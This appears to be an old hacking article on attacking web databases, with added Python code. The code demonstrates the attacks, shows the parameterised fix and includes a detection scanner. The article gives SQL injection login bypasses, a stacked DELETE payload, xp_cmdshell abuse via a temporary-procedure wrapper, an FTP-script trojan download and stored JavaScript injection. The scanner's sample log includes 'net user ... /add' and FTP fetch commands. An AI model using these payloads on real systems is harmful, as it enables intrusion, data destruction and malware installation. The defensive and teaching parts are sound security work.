On database attacks  http://www.fanqiang.com (2001-05-13 14:27:04)
1. Breaking client-side script restrictions. Suppose a page has a text box for the user name but only lets you type four characters. Many programs enforce such limits purely on the client and pop up an error with MsgBox. To get past this during an attack, save the page locally, remove the limit (usually a VBScript or JavaScript check) and submit the modified form. If the check is written in JavaScript it is even simpler: temporarily turn off scripting in the browser. An experienced programmer checks the input again on the server side and, if it is wrong, reports the error with Response.Write or a similar statement.

2. Breaking through with SQL. Take a page that asks for a user name and a password in two text boxes. There is a user ADAM; we don't know his password but want to log in as him. Normally we type ADAM into the first box and, say, 1234 into the second; if the password is right we are let in, otherwise an error is reported. The query in the program may look like this:

SQL = "SELECT * FROM user WHERE username = '" & text1.value & "' AND passwd = '" & text2.value & "'"

which becomes SELECT * FROM user WHERE username = 'adam' AND passwd = '1234'. If instead of 1234 we type 1234' OR '1'='1 into text2, the statement becomes

SELECT * FROM user WHERE username = 'adam' AND passwd = '1234' OR '1'='1'

and we are in. Experienced programmers filter special characters such as the single quote. In general, programmers use one of two customary ways of verifying a login (I'll use ASP with VBScript). The first: run

SELECT * FROM ... WHERE username = '" & Request.Form("username") & "' AND passwd = '" & Request.Form("password") & "'"

and check whether the result set is empty. The second: run SELECT * FROM ... WHERE username = '" & Request.Form("UserName") & "' and then compare, in code, the password stored in the returned row with the one entered. The second method is safer, because whatever is typed into the password box never reaches the query; but the user name is still concatenated into the statement, so it is only partly safe, and the real fix is to bind both values as query parameters instead of building the statement from strings.

3. Multi-statement vulnerabilities. Following the same idea: if the user searches for a book by name (for example, Linux Getting Started), the statement is

SELECT book.name, book.content FROM book WHERE bookname = 'Linux Getting Started'

If instead of Linux Getting Started we enter Linux Getting Started'; DELETE FROM user WHERE '1'='1 we have turned it into a deletion of the table. The precondition for success is that the other side allows several statements to be executed in one call. Since the program does nothing about the delimiter ', how much damage the hole can do depends on the kind of result set the program uses and on the database configuration.
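The two login-check styles and the multi-statement search described above, as an added example that is not part of the original article. It is written in Python with sqlite3 standing in for the ASP/SQL Server pair, and the users, the book row and the payloads are all constructed for the example. The third login function, with bound parameters, is the fix the article does not show. sqlite3's execute() accepts only one statement per call while executescript() runs all of them, which stands in for the "does the other side allow multiple statements" question.

```python
import sqlite3


def make_db():
    """Constructed sample data: a user table and a book table like the ones the article assumes."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE user (username TEXT, passwd TEXT);
        INSERT INTO user VALUES ('adam', 's3cret'), ('bob', 'hunter2');
        CREATE TABLE book (name TEXT, content TEXT);
        INSERT INTO book VALUES ('Linux Getting Started', 'chapter 1 ...');
    """)
    return conn


def login_concat(conn, username, password):
    """Vulnerable: same shape as the article's first method,
    SQL = "SELECT * FROM user WHERE username='" & text1 & "' AND passwd='" & text2 & "'"."""
    sql = "SELECT * FROM user WHERE username = '%s' AND passwd = '%s'" % (username, password)
    return conn.execute(sql).fetchone() is not None


def login_lookup_then_compare(conn, username, password):
    """The article's second method: fetch the row by user name only, compare the password in code.
    The password box can no longer inject, but the user name is still concatenated."""
    sql = "SELECT passwd FROM user WHERE username = '%s'" % username
    row = conn.execute(sql).fetchone()
    return row is not None and row[0] == password


def login_param(conn, username, password):
    """Hardened: placeholders. Input is bound as data and never parsed as SQL."""
    row = conn.execute(
        "SELECT * FROM user WHERE username = ? AND passwd = ?", (username, password)
    ).fetchone()
    return row is not None


def search_books(conn, bookname, allow_multiple_statements):
    """The book search with the same concatenation bug. Whether an injected second statement
    runs depends on the driver: execute() takes one statement, executescript() runs them all.
    Returns True if the call executed, False if the driver refused the stacked statement."""
    sql = "SELECT name, content FROM book WHERE name = '%s'" % bookname
    if allow_multiple_statements:
        conn.executescript(sql)  # runs every statement; SELECT results are discarded
        return True
    try:
        conn.execute(sql).fetchall()
        return True
    except (sqlite3.Warning, sqlite3.Error):  # "You can only execute one statement at a time."
        return False


def user_count(conn):
    return conn.execute("SELECT COUNT(*) FROM user").fetchone()[0]


def demo():
    """Run every case and collect the outcomes so they can be checked."""
    conn = make_db()
    results = {}
    # Password box: 1234' OR '1'='1  (the final quote the program appends closes the last literal)
    bypass = "1234' OR '1'='1"
    results["concat_bypass"] = login_concat(conn, "adam", bypass)
    results["lookup_bypass_via_password"] = login_lookup_then_compare(conn, "adam", bypass)
    # User name box: ' UNION SELECT 'x  makes the lookup return a password the attacker chose
    results["lookup_bypass_via_username"] = login_lookup_then_compare(conn, "' UNION SELECT 'x", "x")
    results["param_bypass"] = login_param(conn, "adam", bypass)
    results["param_legit"] = login_param(conn, "adam", "s3cret")
    # Book search with a stacked DELETE, first where one statement per call is enforced, then not
    payload = "Linux Getting Started'; DELETE FROM user WHERE '1'='1"
    results["single_stmt_executed"] = search_books(conn, payload, allow_multiple_statements=False)
    results["single_stmt_users_left"] = user_count(conn)
    results["multi_stmt_executed"] = search_books(conn, payload, allow_multiple_statements=True)
    results["multi_stmt_users_left"] = user_count(conn)
    return results


if __name__ == "__main__":
    for name, value in demo().items():
        print(name, value)
```

Note that the lookup-then-compare method only closes the password box: the UNION payload in the user name box makes the query hand back a password of the attacker's choosing, which is why binding both values as parameters is the only version here that resists every payload.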
First, the result set: if it supports only a single SQL statement, then all you can do is the OR '1'='1 trick in the password box to log in, and nothing more. Where several statements are allowed, the same approach can also be used to add users to the database.

4. When SQL Server is installed, the administrative user sa is created automatically with an empty password, and many people never change it after installation, which leaves a huge security hole; I'll come back to it later. The database connection in a program is usually not made in global.asa but in an include (.inc) file. Include files are habitually kept under the web root in /include or /inc, with names like config.inc, db_conn.inc, dbconn.inc and so on, which can sometimes be guessed. Even if the directory cannot be listed, once the file name has been guessed, because .inc is usually not mapped to a script handler, requesting it directly does not download the file but displays its source. Also, when the main program includes a .inc file and does not handle ', the error message returned when the error occurs at run time exposes the .inc file; I have run into several such cases. In fact IIS can be configured not to return script error messages.

5. Using the database. If the account the program connects with has very few rights, say most tables are read-only, there is little you can do. What you can still do is guess table and column names in order to delete data or tables. INSERT statements are the tiresome ones: there are many columns, and you also have to deal with the trailing ")". I'll talk about MS SQL Server, which I know best. Its default port is 1433. Telnet to that port on the server; if it connects, the server is running MS SQL Server, which of course is quite possible. Now, on to using the database. If the other side's database sits directly on the web server, you know the port number and you have an account, just connect with Query Analyzer to reach the database directly.
In it you can execute SQL statements. The commonly used one is the stored procedure master.dbo.xp_cmdshell, an extended stored procedure that takes a single parameter and hands it to the operating system to execute as a command. If you are connected as the administrative user you have the right to execute this stored procedure, and you can do a great deal: ipconfig shows the IP configuration, net user lists the system users. However, NET USER username password /ADD does not always succeed; sometimes it returns "the specified login session does not exist" without executing, and I am not sure why. If you don't have permission, MS SQL Server has a vulnerability: create a temporary stored procedure that wraps the call, and the check is bypassed, for example:

CREATE PROC #cmdshell (@cmdstr varchar(200)) AS EXEC master.dbo.xp_cmdshell @cmdstr

Of course you still have no permission for NET USER /ADD and the like, but you can look around and you can create files. So write an FTP script with ECHO, put a trojan on an FTP site, then call FTP from the stored procedure with that script to download and install it, and then... heh :) If the database is not installed on the web server, or the port number has been changed so that it cannot be found, there is still a way. If the database server cannot be reached directly from the Internet, you can use holes in the program to delete or modify data, or to put JavaScript into the database: usually they do not filter < and > when storing records, so you can use JavaScript to redirect visitors to another site or do other things.
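An added example, not from the original article: a small scanner over captured T-SQL statements that flags the things just described, namely xp_cmdshell, a temporary procedure that wraps it, later calls made through that wrapper (where the string xp_cmdshell no longer appears), net user /add, an ftp -s: script, a write statement stacked after the first and an always-true condition. The rule names, the regular expressions and the sample statements are this example's own and were constructed for it; the patterns are deliberately simple and would need tuning before being trusted on real traffic.

```python
import re

# Rules for the techniques described in the article. Constructed for this example;
# each one is matched against a single captured statement.
RULES = [
    ("xp_cmdshell",      re.compile(r"\bxp_cmdshell\b", re.I)),
    ("temp_proc_create", re.compile(r"\bcreate\s+proc(?:edure)?\s+#\w+", re.I)),
    ("temp_proc_exec",   re.compile(r"\bexec(?:ute)?\s+#\w+", re.I)),
    ("net_user_add",     re.compile(r"\bnet\s+user\b.*/add\b", re.I)),
    ("ftp_script",       re.compile(r"\bftp\b[^;]*-s:", re.I)),
    # a second write statement stacked after the first: the multi-statement injection
    ("stacked_write",    re.compile(r";\s*(?:delete|drop|insert|update)\b", re.I)),
    # OR 1=1, OR '1'='1, WHERE '1'='1: the always-true condition
    ("tautology",        re.compile(r"\b(?:or|where)\s+'?(\w+)'?\s*=\s*'?\1'?", re.I)),
]
CREATE_NAME = re.compile(r"\bcreate\s+proc(?:edure)?\s+(#\w+)", re.I)
EXEC_NAME = re.compile(r"\bexec(?:ute)?\s+(#\w+)", re.I)


def scan(statements):
    """Return [(line_no, [tags])] for every statement that trips at least one rule.

    Keeps a little state: a temporary procedure whose body calls xp_cmdshell is
    remembered, so later EXEC #name calls are flagged even though the text
    'xp_cmdshell' never appears in them."""
    wrappers = set()
    findings = []
    for n, stmt in enumerate(statements, 1):
        tags = [name for name, rx in RULES if rx.search(stmt)]
        if "temp_proc_create" in tags and "xp_cmdshell" in tags:
            wrappers.add(CREATE_NAME.search(stmt).group(1).lower())
        m = EXEC_NAME.search(stmt)
        if m and m.group(1).lower() in wrappers:
            tags.append("xp_cmdshell_via_wrapper")
        if tags:
            findings.append((n, tags))
    return findings


# Constructed sample of captured statements: two benign queries among the attack traffic.
SAMPLE_LOG = [
    "SELECT name, content FROM book WHERE name = 'Linux Getting Started'",
    "SELECT * FROM user WHERE username = 'adam' AND passwd = '1234' OR '1'='1'",
    "SELECT name, content FROM book WHERE name = 'Linux Getting Started'; DELETE FROM user WHERE '1'='1'",
    "EXEC master.dbo.xp_cmdshell 'ipconfig'",
    "CREATE PROC #cmdshell (@cmdstr varchar(200)) AS EXEC master.dbo.xp_cmdshell @cmdstr",
    "EXEC #cmdshell 'net user newadmin p@ss /add'",
    "EXEC #cmdshell 'echo open ftp.example.invalid > c:\\s.txt & ftp -s:c:\\s.txt'",
    "SELECT COUNT(*) FROM user",
]


if __name__ == "__main__":
    for line_no, tags in scan(SAMPLE_LOG):
        print("%d: %s" % (line_no, ", ".join(tags)))
```

The wrapper tracking is the part worth keeping: once a temporary procedure has been created around xp_cmdshell, every call through it looks like an ordinary EXEC of a temp procedure, so a scanner that only greps for xp_cmdshell misses the net user and ftp commands entirely.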